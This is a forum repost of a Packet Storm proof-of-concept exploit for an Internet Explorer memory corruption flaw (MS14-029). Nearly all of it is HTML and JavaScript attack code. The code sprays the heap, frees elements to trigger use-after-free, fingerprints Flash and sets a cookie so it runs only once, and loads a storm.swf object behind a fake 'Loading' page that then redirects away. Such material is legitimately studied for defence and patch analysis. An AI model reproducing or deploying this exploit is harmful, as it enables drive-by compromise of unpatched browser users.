Microsoft Internet Explorer MS14-029 Memory Corruption

[Nytro]

Microsoft Internet Explorer MS14-029 Memory Corruption

Authored by PhysicalDrive0

Microsoft Internet Explorer memory corruption proof of concept exploit that leverages the vulnerability noted in MS14-029.

<!doctype html>
<html>
<head>
<meta http-equiv="Cache-Control" content="no-cache"/>
<sc?ript >
func?tion stc()
{
var Then = new Date();
Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 7 );
document.cookie = "Cookie1=d93kaj3Nja3; expires="+ Then.toGMTString();
}
func?tion cid()
{
var swf = 0;
try {
swf = new ActiveXObject('ShockwaveFlash.ShockwaveFlash'); } catch (e) {
}
if (!swf)
return 0;
var cookieString = new String(document.cookie);
if(cookieString.indexOf("d93kaj3Nja3") == -1)
{stc(); return 1;}else{ return 0;}
}
String.prototype.repeat=func?tion (i){return new Array(isNaN(i)?1:++i).join(this);}
var tpx=un?escape ("%u1414%u1414").repeat(0x60/4-1);
var ll=new Array();
for (i=0;i<3333;i++)ll.push(document.create?Element("img"));
for(i=0;i<3333;i++) ll[i].className=tpx;
for(i=0;i<3333;i++) ll[i].className="";
CollectGarbage();
func?tion b2()
{
try{xdd.re?placeNode(document.createTextNode(" "));}catch(exception){}
try{xdd.outerText='';}catch(exception){}
CollectGarbage();
for(i=0;i<3333;i++) ll[i].className=tpx;
}
func?tion a1(){
if (!cid())
return;
document.body.contentEditable="true";
try{xdd.applyElement(document.create?Element("frameset"));}catch(exception){}
try{document.selection.createRange().select();}catch(exception){}
}
</ sc?ript >
</head>
<body onload='setTimeout("a1();",2000);' onresize=b2()>
<marquee id=xdd > </marquee>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="1%" height="1%" id="FE">
<param name="movie" value="storm.swf" />
<param name="quality" value="high" />
<param name="bgcolor" value="#ffffff" />
<param name="allowScriptAccess" value="sameDomain" />
<param name="allowFullScreen" value="true" />
</object>
</body>
<body>
<form name=loading>
¡¡<p align=center> <font color="#0066ff" size="2"> Loading....,Please Wait</font> <font color="#0066ff" size="2" face="verdana"> ...</font>
¡¡¡¡<input type=text name=chart size=46 style="font-family:verdana; font-weight:bolder; color:#0066ff; background-color:#fef4d9; padding:0px; border-style:none;">
¡¡¡¡
¡¡¡¡<input type=text name=percent size=47 style="color:#0066ff; text-align:center; border-width:medium; border-style:none;">
¡¡¡¡<sc?ript > ¡¡
var bar=0¡¡
var line="||"¡¡
var amount="||"¡¡
count()¡¡
func?tion count(){¡¡
bar=bar+2¡¡
amount =amount + line¡¡
document.loading.chart.value=amount¡¡
document.loading.percent.value=bar+"%"¡¡
if (bar<99)¡¡
{setTimeout("count()",500);}¡¡
else¡¡
{window.location = "http://www.google.com.hk";}¡¡
}</ sc?ript >
¡¡</p>
</form>
<p align="center"> Wart,<a style="text-decoration: none" href="http://www.google.com.hk"> <font color="#FF0000"> kick me</font> </a> .</p>
</body>
</html>

Sursa: Microsoft Internet Explorer MS14-029 Memory Corruption ? Packet Storm